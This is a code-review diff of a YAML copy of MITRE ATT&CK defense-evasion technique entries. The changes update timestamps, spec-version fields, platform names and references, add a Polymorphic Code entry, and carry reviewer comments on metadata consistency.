- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
@@ -9006,7 +9103,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests: []
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests: []
T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests: []
T1601:
@@ -9330,7 +9422,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9365,8 +9457,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -9432,7 +9522,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -9458,7 +9547,7 @@ defense-evasion:
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9483,11 +9572,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9504,7 +9592,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -9514,7 +9601,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9523,19 +9610,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
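Review bot: T1078's platform list loses `Azure AD`, `Office 365` and `Google Workspace` and gains `Office Suite` and `Identity Provider` (version '2.6' to '2.7'). Anything that selects techniques by the old platform strings, such as a per-platform index, will silently stop matching this technique, so check that the index generator and any filters have been updated for the new names; the same rename is applied to T1556.006 further down.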
@@ -9583,11 +9668,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -9655,18 +9741,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1564.009:
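Review bot: the `Leitch Hollowing` reference keeps its author and title but its `url` changes from `http://www.autosectools.com/process-hollowing.pdf` to a PDF on `new.dc414.org`, a different host, with the retrieval date updated to September 12, 2024. If this substitution comes from the upstream ATT&CK bundle that is fine; if it was made locally, say so in the commit message, since the unchanged source_name still points readers at the original publication.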
@@ -9713,7 +9798,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
@@ -9735,7 +9820,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -9810,6 +9894,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
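Review bot: `'Application Log: Application Log Content'` is added to T1027's `x_mitre_data_sources`, but no hunk for this object touches `modified` or `x_mitre_version`, so the content change lands without the `modified` bump that the other changed techniques in this diff receive. Check whether the upstream object's version was also updated and the generator missed it, or whether this line was added by hand.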
@@ -9869,12 +9954,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9903,24 +9987,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -9955,9 +10041,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -9980,7 +10063,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -9998,8 +10081,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
@@ -10038,7 +10119,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10081,10 +10162,78 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests: []
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
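Review bot: `x_mitre_detection: ''` on the new T1027.014 entry is empty even though the entry declares three data sources (`Application Log: Application Log Content`, `File: File Creation`, `File: File Metadata`); if the index renders detection guidance, this technique will show a blank, so confirm that the empty string comes from upstream rather than from the generator dropping the field. The new entry also carries `x_mitre_attack_spec_version: 3.2.0` and no `spec_version`, while the T1564.006 entry at the top of the hunk loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0`; the field set should end up the same for every entry once the regeneration settles, and it is worth a line in the commit message saying which fields are expected to survive.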
@@ -10128,7 +10277,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
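Review bot: the `modified` timestamp for T1134.005 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-02-09T15:49:58.414Z`. The same pattern recurs across this diff (T1599, T1548.004, T1218.010, T1574.009, T1218.009, T1564.007, T1197): every old value ends in `14:00:00.188Z`, which looks like a batch-stamped placeholder, and every replacement is earlier and carries a millisecond value that looks like a real upstream timestamp. That is plausibly the STIX `modified` field now being passed through unchanged, but it should be stated in the commit message, and anything that uses `modified` to detect changed techniques will treat these entries as older than before.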
@@ -10153,8 +10302,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1599:
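Review bot: this removal drops `x_mitre_attack_spec_version` outright from T1134.005 instead of bumping it, so the entry ends up with no spec-version field at all; by contrast T1599 keeps `x_mitre_attack_spec_version: 2.1.0` and only loses `spec_version: '2.1'`. T1218.009 and T1564.007 are handled the same way as T1134.005 in later hunks. If the absence is intentional (the key is absent from the upstream object for these techniques), a short note in the commit message would save the next reader from checking each entry by hand; if not, the generator should emit the key consistently.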
@@ -10185,7 +10332,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
@@ -10204,7 +10351,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -10299,11 +10445,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10383,11 +10528,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10452,12 +10596,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests: []
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10506,8 +10649,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -10522,14 +10665,13 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests: []
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10541,7 +10683,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -10571,13 +10713,12 @@ defense-evasion:
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10638,7 +10779,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1027.003:
@@ -10694,11 +10834,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10722,11 +10861,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
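Review bot: the platform rename for T1550.004 (`Office 365` and `Google Workspace` replaced by `Office Suite`, version `1.3` to `1.4`) changes the vocabulary that any platform-specific index would key on; the same replacement is applied to T1656 and T1562.008 in later hunks (the latter also maps `Azure AD` to `Identity Provider`). Anything that filters this file by the old platform strings (an index generator, a per-platform CSV, a test-selection script) needs the mapping updated, otherwise these techniques silently disappear from those views. `SaaS` and `IaaS` are retained here, so the change is the platform taxonomy, not a scope reduction.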
@@ -10751,9 +10889,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
